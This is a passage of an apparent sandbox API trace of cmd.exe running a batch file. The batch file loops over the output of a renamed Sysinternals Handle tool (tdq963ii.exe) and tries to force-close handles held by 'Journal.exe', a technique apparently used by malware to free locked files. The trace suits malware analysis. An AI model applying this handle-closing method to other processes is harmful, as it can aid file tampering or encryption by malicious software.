lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x28f314, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x28f314*=0x26) returned 1 [0219.560] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x28f5a4 | out: _Buffer="FOR") returned 3 [0219.560] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.560] GetFileType (hFile=0x7) returned 0x2 [0219.560] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.560] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f564 | out: lpMode=0x28f564) returned 1 [0219.560] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.560] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x28f590, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f590*=0x3) returned 1 [0219.561] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x28f5a4 | out: _Buffer=" /F") returned 3 [0219.561] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.561] GetFileType (hFile=0x7) returned 0x2 [0219.561] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.561] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f564 | out: lpMode=0x28f564) returned 1 [0219.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.562] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x28f590, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f590*=0x3) returned 1 [0219.562] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x28f5a4 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0219.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.562] GetFileType (hFile=0x7) returned 0x2 [0219.563] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.563] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f564 | out: lpMode=0x28f564) returned 1 [0219.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.563] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x28f590, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f590*=0x20) returned 1 [0219.563] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x28f5a4 | out: _Buffer=" %I IN ") returned 7 [0219.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.563] GetFileType (hFile=0x7) returned 0x2 [0219.564] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.564] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f564 | out: lpMode=0x28f564) returned 1 [0219.564] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.564] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x28f590, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f590*=0x7) returned 1 [0219.566] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x28f5a0 | out: _Buffer="(`tdq963ii.exe -accepteula \"Journal.exe\" -nobanner`) DO ") returned 56 [0219.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.566] GetFileType (hFile=0x7) returned 0x2 [0219.566] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.566] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f560 | out: lpMode=0x28f560) returned 1 [0219.567] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.567] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x38, lpNumberOfCharsWritten=0x28f58c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f58c*=0x38) returned 1 [0220.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.021] GetFileType (hFile=0x7) returned 0x2 [0220.021] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.021] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f56c | out: lpMode=0x28f56c) returned 1 [0220.022] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.022] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x28f598, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x28f598*=0x1) returned 1 [0220.022] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.022] GetFileType (hFile=0x7) returned 0x2 [0220.023] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.023] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f550 | out: lpMode=0x28f550) returned 1 [0220.023] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.023] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x55f4c8*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x28f57c, lpReserved=0x0 | out: lpBuffer=0x55f4c8*, lpNumberOfCharsWritten=0x28f57c*=0xc) returned 1 [0220.023] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f588 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0220.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.024] GetFileType (hFile=0x7) returned 0x2 [0220.024] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.024] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f548 | out: lpMode=0x28f548) returned 1 [0220.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.024] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x28f574, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f574*=0x26) returned 1 [0220.026] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f5a4 | out: _Buffer=") ") returned 2 [0220.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.027] GetFileType (hFile=0x7) returned 0x2 [0220.027] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.027] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f564 | out: lpMode=0x28f564) returned 1 [0220.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.027] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f590, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f590*=0x2) returned 1 [0220.028] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f5c4 | out: _Buffer="\r\n") returned 2 [0220.028] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.028] GetFileType (hFile=0x7) returned 0x2 [0220.028] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.028] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f584 | out: lpMode=0x28f584) returned 1 [0220.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.029] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f5b0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f5b0*=0x2) returned 1 [0220.031] GetProcessHeap () returned 0x550000 [0220.031] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2c) returned 0x551280 [0220.031] GetProcessHeap () returned 0x550000 [0220.031] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xc) returned 0x550db8 [0220.031] GetProcessHeap () returned 0x550000 [0220.031] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xc) returned 0x550dd0 [0220.031] GetProcessHeap () returned 0x550000 [0220.031] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe) returned 0x550de8 [0220.031] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0220.031] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0220.031] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0220.031] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0220.031] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0220.031] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0220.031] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0220.031] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x28f4e0, _Radix=0 | out: _EndPtr=0x28f4e0*=",6 delims=: \"") returned 3 [0220.031] wcstol (in: _String="6 delims=: \"", _EndPtr=0x28f4e0, _Radix=0 | out: _EndPtr=0x28f4e0*=" delims=: \"") returned 6 [0220.031] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0220.031] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0220.031] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0220.032] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0220.032] GetProcessHeap () returned 0x550000 [0220.032] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x550de8 | out: hHeap=0x550000) returned 1 [0220.032] GetProcessHeap () returned 0x550000 [0220.032] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe) returned 0x550de8 [0220.032] GetProcessHeap () returned 0x550000 [0220.032] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x550db8, Size=0xe) returned 0x550e00 [0220.032] GetProcessHeap () returned 0x550000 [0220.032] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x550e00) returned 0xe [0220.032] GetProcessHeap () returned 0x550000 [0220.032] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x550dd0, Size=0x14) returned 0x5643a8 [0220.032] GetProcessHeap () returned 0x550000 [0220.032] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x5643a8) returned 0x14 [0220.032] _wpopen (_Command="tdq963ii.exe -accepteula \"Journal.exe\" -nobanner", _Mode="rb") returned 0x77032960 [0220.049] feof (_File=0x77032960) returned 0 [0220.049] ferror (_File=0x77032960) returned 0 [0220.049] GetProcessHeap () returned 0x550000 [0220.049] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x108) returned 0x5643c8 [0220.049] fgets (in: _Buf=0x5643d0, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0224.568] feof (_File=0x77032960) returned 0 [0224.568] ferror (_File=0x77032960) returned 0 [0224.568] GetProcessHeap () returned 0x550000 [0224.569] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5643c8, Size=0x208) returned 0x5643c8 [0224.569] GetProcessHeap () returned 0x550000 [0224.569] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x5643c8) returned 0x208 [0224.569] fgets (in: _Buf=0x564416, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0224.569] feof (_File=0x77032960) returned 0 [0224.569] ferror (_File=0x77032960) returned 0 [0224.569] GetProcessHeap () returned 0x550000 [0224.569] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5643c8, Size=0x308) returned 0x5643c8 [0224.569] GetProcessHeap () returned 0x550000 [0224.569] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x5643c8) returned 0x308 [0224.569] fgets (in: _Buf=0x564419, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0225.962] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0225.963] GetProcessHeap () returned 0x550000 [0225.963] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5643c8, Size=0x9e) returned 0x5643c8 [0225.963] GetProcessHeap () returned 0x550000 [0225.963] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x5643c8) returned 0x9e [0225.963] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x564419, cbMultiByte=73, lpWideCharStr=0x5643d0, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0225.964] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f1d4 | out: _Buffer="\r\n") returned 2 [0225.964] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.964] GetFileType (hFile=0x7) returned 0x2 [0225.964] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.964] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f194 | out: lpMode=0x28f194) returned 1 [0225.965] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.965] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f1c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f1c0*=0x2) returned 1 [0225.967] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0225.967] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f1d0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0225.967] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x28f1d0 | out: _Buffer=">") returned 1 [0225.967] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.967] GetFileType (hFile=0x7) returned 0x2 [0225.968] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.968] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f198 | out: lpMode=0x28f198) returned 1 [0225.968] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.968] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x28f1c4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x28f1c4*=0x26) returned 1 [0225.969] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.969] GetFileType (hFile=0x7) returned 0x2 [0225.969] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.969] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f41c | out: lpMode=0x28f41c) returned 1 [0225.970] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.970] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x28f448, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x28f448*=0x1) returned 1 [0225.970] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.970] GetFileType (hFile=0x7) returned 0x2 [0225.971] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.971] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f400 | out: lpMode=0x28f400) returned 1 [0225.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.971] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x574b08*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x28f42c, lpReserved=0x0 | out: lpBuffer=0x574b08*, lpNumberOfCharsWritten=0x28f42c*=0xc) returned 1 [0225.972] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f438 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0225.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.972] GetFileType (hFile=0x7) returned 0x2 [0225.973] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.973] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f3f8 | out: lpMode=0x28f3f8) returned 1 [0225.973] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.973] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x28f424, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f424*=0x2c) returned 1 [0225.975] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f454 | out: _Buffer=") ") returned 2 [0225.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.975] GetFileType (hFile=0x7) returned 0x2 [0225.975] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.975] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f414 | out: lpMode=0x28f414) returned 1 [0225.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.976] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f440, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f440*=0x2) returned 1 [0225.976] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f474 | out: _Buffer="\r\n") returned 2 [0225.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.976] GetFileType (hFile=0x7) returned 0x2 [0225.977] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.977] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f434 | out: lpMode=0x28f434) returned 1 [0225.977] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.977] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f460, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x28f460*=0x2) returned 1 [0225.978] GetConsoleTitleW (in: lpConsoleTitle=0x28ef84, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.980] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x564718, lpFilePart=0x28eaa4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28eaa4*="Desktop") returned 0x25 [0225.980] SetErrorMode (uMode=0x0) returned 0x1 [0225.980] GetProcessHeap () returned 0x550000 [0225.980] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x564710, Size=0x6e) returned 0x564710 [0225.980] GetProcessHeap () returned 0x550000 [0225.980] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x564710) returned 0x6e [0225.981] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.981] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0225.981] GetProcessHeap () returned 0x550000 [0225.981] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x120) returned 0x564788 [0225.981] GetProcessHeap () returned 0x550000 [0225.981] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x238) returned 0x5648b0 [0225.981] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.981] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x28e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e840) returned 0x564a60 [0225.981] FindClose (in: hFindFile=0x564a60 | out: hFindFile=0x564a60) returned 1 [0225.982] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0225.982] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0225.982] GetConsoleTitleW (in: lpConsoleTitle=0x28ed18, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.982] InitializeProcThreadAttributeList (in: lpAttributeList=0x28eba0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ec68 | out: lpAttributeList=0x28eba0, lpSize=0x28ec68) returned 1 [0225.982] UpdateProcThreadAttribute (in: lpAttributeList=0x28eba0, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ec60, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28eba0, lpPreviousValue=0x0) returned 1 [0225.982] GetStartupInfoW (in: lpStartupInfo=0x28eb5c | out: lpStartupInfo=0x28eb5c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0225.982] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0225.982] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x28ebfc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ec48 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x28ec48*(hProcess=0x74, hThread=0x84, dwProcessId=0x490, dwThreadId=0x38c)) returned 1 [0225.998] CloseHandle (hObject=0x84) returned 1 [0225.998] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0225.998] GetProcessHeap () returned 0x550000 [0225.998] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567698 | out: hHeap=0x550000) returned 1 [0225.998] GetEnvironmentStringsW () returned 0x566b10* [0225.998] GetProcessHeap () returned 0x550000 [0225.998] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb7e) returned 0x567698 [0225.998] FreeEnvironmentStringsW (penv=0x566b10) returned 1 [0225.998] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0228.188] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x28eb3c | out: lpExitCode=0x28eb3c*=0x1) returned 1 [0228.188] CloseHandle (hObject=0x74) returned 1 [0228.188] _vsnwprintf (in: _Buffer=0x28ec84, _BufferCount=0x13, _Format="%08X", _ArgList=0x28eb48 | out: _Buffer="00000001") returned 8 [0228.188] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0228.188] GetProcessHeap () returned 0x550000 [0228.188] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567698 | out: hHeap=0x550000) returned 1 [0228.188] GetEnvironmentStringsW () returned 0x566b10* [0228.188] GetProcessHeap () returned 0x550000 [0228.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb7e) returned 0x567698 [0228.188] FreeEnvironmentStringsW (penv=0x566b10) returned 1 [0228.188] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0228.188] GetProcessHeap () returned 0x550000 [0228.188] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567698 | out: hHeap=0x550000) returned 1 [0228.188] GetEnvironmentStringsW () returned 0x566b10* [0228.188] GetProcessHeap () returned 0x550000 [0228.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb7e) returned 0x567698 [0228.188] FreeEnvironmentStringsW (penv=0x566b10) returned 1 [0228.188] GetProcessHeap () returned 0x550000 [0228.188] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x550dd0 | out: hHeap=0x550000) returned 1 [0228.188] DeleteProcThreadAttributeList (in: lpAttributeList=0x28eba0 | out: lpAttributeList=0x28eba0) [0228.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.189] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0228.190] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.190] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0228.190] _get_osfhandle (_FileHandle=0) returned 0x3 [0228.190] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0228.190] SetConsoleInputExeNameW () returned 0x1 [0228.191] GetConsoleOutputCP () returned 0x1b5 [0228.191] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0228.191] SetThreadUILanguage (LangId=0x0) returned 0x409 [0228.191] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f56c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0228.191] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0228.191] _get_osfhandle (_FileHandle=3) returned 0x74 [0228.192] SetFilePointer (in: hFile=0x74, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5649e0 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5648b0 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564788 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564710 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564688 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564470 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x574b48 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x574b00 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x550de8 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5643a8 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: 